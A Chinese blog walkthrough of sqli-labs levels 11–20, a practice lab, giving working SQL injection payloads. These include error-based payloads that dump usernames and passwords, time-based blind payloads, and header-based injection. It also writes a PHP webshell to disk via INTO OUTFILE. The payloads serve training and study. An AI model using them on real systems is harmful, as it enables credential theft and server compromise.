Sqlilab闯关记录(11~20)(白盒测试)

最新推荐文章于 2023-04-10 16:09:30 发布
最新推荐文章于 2023-04-10 16:09:30 发布
阅读量777 收藏 2
点赞数
文章标签: 安全性测试 系统安全 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56375711/article/details/128185215
版权

前面10关使用黑盒测试,本篇使用白盒测试,即查看网页源码找到注入点

第11关(POST请求+单引号闭合)

第11关是post请求,当输入正确的账号密码页面显示登陆成功。

 查看网页源码,发现可以使用‘闭合,而且网页把sql语句的错误信息输出 ,可以使用报错注入。

下面开始寻找注入点,尝试在uname参数注入payload:

uname=Dumb' and 1=1#&passwd=Dumb&submit=Submit页面正常显示

uname=Dumb' and 1=2#&passwd=Dumb&submit=Submit页面报错

找到注入点

尝试注入:

payload:

 uname=Dumb' and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=Dumb&submit=Submit

爆出数据库名称security

接下来就是熟悉的爆表和爆列名和爆数据: 

uname=Dumb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

爆出表名users

 uname=Dumb' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#

爆出users表的所有列

uname=Dumb' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#

爆数据:

payload:

爆security的表名:
uname=Dumb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=Dumb&submit=Submit

爆users的列名:
uname=Dumb' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=Dumb&submit=Submit

爆数据:
uname=Dumb' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&passwd=Dumb&submit=Submit

uname=Dumb' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),32,31),0x7e),1)#&passwd=Dumb&submit=Submit

第12关(双引号+括号闭合)

第十二关使用”闭合,同样输出sql语句查询的报错信息,使用报错注入

第十二关和第十一关的思路相同,只不过这一关使用:)闭合前面的sql语句,就不重复演示了,给出下面payload:

爆security的表名:
uname=Dumb") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=Dumb&submit=Submit

爆users的列名:
uname=Dumb") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=Dumb&submit=Submit

爆数据:
uname=Dumb") and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&passwd=Dumb&submit=Submit

uname=Dumb") and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),32,31),0x7e),1)#&passwd=Dumb&submit=Submit

第十三关(单引号+括号闭合)

第十三关使用’)闭合,同样输出sql语句查询的报错信息,使用报错注入

第十三关和第十一关思路也相同,只不过这一关使用‘)闭合前面的sql语句,不重复演示,给出下面的payload:

爆security的表名:
uname=Dumb') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=Dumb&submit=Submit

爆users的列名:
uname=Dumb') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=Dumb&submit=Submit

爆数据:
uname=Dumb') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&passwd=Dumb&submit=Submit

uname=Dumb') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),32,31),0x7e),1)#&passwd=Dumb&submit=Submit

第十四关(双引号闭合)

第十四关使用“闭合,同样输出sql语句查询的报错信息,使用报错注入

这一关很简单,使用双引号闭合就可以了,不重复演示,思路和上面几道题都一模一样,给出payload:

爆security的表名:
uname=Dumb" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=Dumb&submit=Submit

爆users的列名:
uname=Dumb" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=Dumb&submit=Submit

爆数据:
uname=Dumb" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&passwd=Dumb&submit=Submit

uname=Dumb" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),32,31),0x7e),1)#&passwd=Dumb&submit=Submit

第十五关(时间盲注)

第十五关发现报错注入页面没有回显,说明用不了,所以尝试使用时间盲注,网页源代码中也表明把数据库的error信息屏蔽掉了。

payload:

uname=Dumb' and if(length(database())=8,sleep(5),1)#&passwd=&submit=Submit

数据库的长度若为8,页面5秒后返回,找到数据的长度

接下来就是使用脚本结合substr函数判断数据库的每一个元素是什么,这里就不演示,后续博客会将脚本分享出来。(爆数据的方法)

更简单的是写一句话木马到数据库中然后使用冰蝎链接。

一句话木马:

uname=Dumb' or 1=1 limit 0,1 into outfile 'C:/less15.php' lines terminated by 0x3C3F7068702061737365727428245F504F53545B6C65737331355D293B3F3E#&passwd=pass&submit=Submit

 第十六关

第十六关使用”)闭合,sql语句的报错信息被屏蔽了,所以还是使用时间盲注

 其他思路和上一关一样

payload:

uname=Dumb“) and if(length(database())=8,sleep(5),1)#&passwd=&submit=Submit

数据库的长度若为8,页面5秒后返回,找到数据的长度

接下来就是使用脚本结合substr函数判断数据库的每一个元素是什么,这里就不演示,后续博客会将脚本分享出来。(爆数据的方法)

更简单的是写一句话木马到数据库中然后使用冰蝎链接。

一句话木马:

uname=Dumb' or 1=1 limit 0,1 into outfile 'C:/less16.php' lines terminated by 0x3C3F7068702061737365727428245F504F53545B6C65737331355D293B3F3E#&passwd=pass&submit=Submit

第十七关

第十七关发现源码中多了对输入字符转码的函数,但只对uname进行检查,可以在password处进行注入

同时发现要用户名正确之后才会执行update语句,才可出现注入点password。

存在sql查询语句的报错信息输出,可以使用报错注入

payload:

uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit

 

成功爆出数据库名称security,接下来就是和前面一样的爆数据

 payload:

爆security的表名:
uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&submit=Submit

爆users的列名:
uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&submit=Submit

爆数据:
uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&submit=Submit

uname=Dumb#&passwd=Dumb' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),32,31),0x7e),1)&submit=Submit

第十八关

首先观察源码,发现对输入的uname和password都进行了转义,所以第一条查询语句无注入点,发现下面还有一条insert语句存在注入点,uagent可进行注入

 使用burpsuit进行抓包,然后将user-agent字段改为

1'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '

insert语句被改写,页面爆出数据库名称security

 

 

 第十九关

查看源码,发现此关注入点在refer字段,还是用burpsuit抓包,修改字段,和上一关一样。

 

 第二十关

此关注入点在cookie字段,源码如下:

在burpsuit的cookie字段加payload:

Cookie: uname=Dumb'' and updatexml(1,concat(0x7e,database(),0x7e),1)#

爆出数据库名称security,接下来还是熟悉的爆数据工作,就不再重重复演示了。 

 

 

m0_56375711
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sql-lab全解_sqllab,给后辈的一点建议
m0_60721649的博客
04-08 836
引起报错的是0x7e这里也就是~符号,这里回显会执行后面的select语句同时以报错的方式回显表名:?表列:?结果:?
记录一下:白盒测试工具集
01-31
dvwa+sqlilab+burp+phpstudy所需安装包.rar
11-08
搭建phpstudy环境,并在phpstudy环境下搭建sqlilab和dvwa,安装dvwa 具体配置详见https://blog.csdn.net/qq_37077262/article/details/102945140
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
sqli-labs-master 过关 46 - 53(附解题思路及解析)
weixin_47306547的博客
09-08 871
目录 第 46 关​ ​​第 47 关 第 48 关​​ 第 49 关 第 50 关 第 51 关 第 52 关 第 53 关 第 46 关 排序注入 源码: $sql = "SELECT * FROM users ORDER BY $id"; select使用文档:https://dev.mysql.com/doc/refman/8.0/en/select.html 分析:不同于 where 查询后可以用 union select
sqli-labs (less-50)
kukudeshuo的博客
03-15 257
sqli-labs (less-50) 进入50关,输入sort=1 http://127.0.0.1/sql1/Less-50/?sort=1' 根据错误信息判断为数字型注入,这里发现这不跟前面有一关一模一样,但是我们通过源代码可知,在本关中使用了mysgli multi guery()函数,而在less46-49关中使用了mysqL fetch_assoc()函数,所以这里的不同点就在于本关可以使用堆叠注入的形式 报错注入攻击和时间盲注的攻击在这里我就不详细介绍了,具体过程请看我的less-46,
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8216
sql注入集合
sqlilab第一关
qq_45491497的博客
07-28 1977
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
工作记录白盒测试
weixin_43761828的博客
11-19 731
Step 1:SDK环境搭建 第一步:建立文件夹toolchain并解压Huanjing.zip/J2AILAB.tar.xz/sampleCode.zip放在其中,压缩包位置如图 第二步:把0615代码交付中dms-postprocess中东西复制过来 将第一步中解压出的三个文件夹放入dms-postprocess/imate目录下,并选择合并替换 第三步:找到下图所示目录下的dms-models.h,并将里面缺失的宏定义补上 第四步:配置docker 安装好docker后,每次执
sqlilab学习打卡|手工注入|Less23-Less31
spring!
04-02 1469
sqlilab学习打卡|手工注入|Less23-Less31
sqlilab学习打卡|手工注入|Less-1 to Less-10
spring!
03-28 1979
sqlilab学习打卡|手工注入|Less-1 to Less-10
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
白盒测试实验 软件测试实验报告
09-16
软件测试实验报告 题目一:用逻辑覆盖测试方法测试以下程序段 void DoWork (int x,int y,int z){ 1 int k=0, j=0; 2 if ( (x>3)&&(z) ) 3 { 4 k=x*y-1; 5 j=sqrt(k); 6 } 7 if((x==4)||(y>5)) 8 j=x*y+10; 9 j=j%3; ...
白盒测试流程图1
08-08
白盒测试流程图1
白盒测试之基本路径测试
03-23
白盒测试测试方法有代码检查法、静态结构分析法、静态质量度量法、逻辑覆盖法、基本路径测试法、域测试、符号测试、Z路径覆盖、程序变异。其中运用最为广泛的是基本  白盒测试测试方法有代码检查法、静态结构...
开关电源白盒测试规范.doc
05-28
开关电源白盒测试规范
sqli-labs-----第11
wyzhxhn的博客
11-09 1663
基于错误的POST型单引号字符型注入
sql注入的闭合方式
quan9i的博客
03-01 3438
文章目录前言错误理解正解 前言 近期在进行sql注入实战时出现了闭合方式不理解,可能是由于长时间未学习,突然再次做题出现了这种问题。对此我将问题总结如下,希望此能解决部分正在学习sql注入的人 错误理解 $sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 此语句中的id首先可以看出是get注入,此时我的想法是'id'是php中
sql-labs闯关26~31
qq_44663230的博客
09-03 2250
sql-labs闯关26-28a 29~31暂时不做
白盒测试和黑盒测试讨论记录
最新发布
09-11
### 回答1: Sure! 首先,我们需要了解白盒测试和黑盒测试的定义和区别。...白盒测试和黑盒测试都是测试过程中不可或缺的重要方法,根据测试目标和需求的不同,可以选择合适的方法或混合使用来提高软件的质量和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值